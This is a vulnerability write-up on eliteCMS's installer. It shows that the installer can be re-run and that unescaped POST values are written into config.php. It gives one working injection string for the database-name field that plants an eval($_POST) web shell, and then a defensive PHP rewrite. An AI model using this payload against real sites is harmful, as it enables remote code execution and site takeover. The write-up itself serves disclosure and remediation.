eliteCMS's installer is not locked once installation has finished, so an attacker can re-run the whole installation simply by visiting the installer URL.

A second vulnerability: the installer can write a one-line PHP backdoor straight into admin/includes/config.php.

Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    // Step 4 generates admin/includes/config.php by string concatenation.
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // The session values below come straight from $_POST (see next listing)
    // and are interpolated into PHP source without any escaping.
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= " die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= " die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The generated source is written to disk as-is.
    $writer = fopen($file, 'w');
    ...

Now look at where those session values come from:

// POST values are copied into the session with no validation or escaping.
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are accepted without any validation whatsoever.

If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

the one-line backdoor ends up written into /admin/includes/config.php (the leading quote closes the generated string literal and the `?>` ends the PHP block, so what follows is saved as live code).
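A defensive rewrite of the step-4 writer, added here as an example (not eliteCMS's own code), covering both problems from the post: a lock file so the installer refuses to run again, and whitelist validation plus var_export() quoting so a POSTed value can never break out of the generated string literal. The lock-file path and the helper function names are assumptions.

```php
<?php
// Added example, not eliteCMS code. Hypothetical names: $lockFile,
// isSafeIdentifier(), isSafeHost(), buildConfig().

// Fix 1: refuse to run once installation has completed (the original never locks).
$lockFile = __DIR__ . '/install.lock';
if (file_exists($lockFile)) {
    http_response_code(403);
    exit('Installer is locked: installation already completed.');
}

// Fix 2a: whitelist the values that will be embedded in generated PHP.
function isSafeIdentifier(string $v): bool {
    // MySQL database and user names: letters, digits, '_' and '-' only.
    return preg_match('/^[A-Za-z0-9_-]{1,64}$/', $v) === 1;
}
function isSafeHost(string $v): bool {
    // Hostname or IP, optionally with :port; no quotes, spaces or '?>'.
    return preg_match('/^[A-Za-z0-9.:_-]{1,255}$/', $v) === 1;
}

// Fix 2b: emit each constant through var_export(), which returns a correctly
// quoted PHP string literal. A value containing a quote or '?>' therefore stays
// inside the literal instead of closing it and opening a new PHP block.
function buildConfig(array $db): string {
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $out .= sprintf("define('%s', %s);\n", $key, var_export($db[$key], true));
    }
    return $out;
}

$db = [
    'DB_SERVER' => (string) ($_POST['DB_SERVER'] ?? ''),
    'DB_NAME'   => (string) ($_POST['DB_NAME'] ?? ''),
    'DB_USER'   => (string) ($_POST['DB_USER'] ?? ''),
    'DB_PASS'   => (string) ($_POST['DB_PASS'] ?? ''), // any chars; quoting handles them
];
if (!isSafeHost($db['DB_SERVER']) || !isSafeIdentifier($db['DB_NAME'])
    || !isSafeIdentifier($db['DB_USER'])) {
    http_response_code(400);
    exit('Invalid database settings.');
}

$file = '../admin/includes/config.php';
if (file_put_contents($file, buildConfig($db), LOCK_EX) === false) {
    exit('Could not write config.php');
}
touch($lockFile); // lock the installer so it cannot be re-run
```

The generated file only contains the define() lines; the original's mysql_* connection block is left out because the point here is the quoting of untrusted input, not the database API.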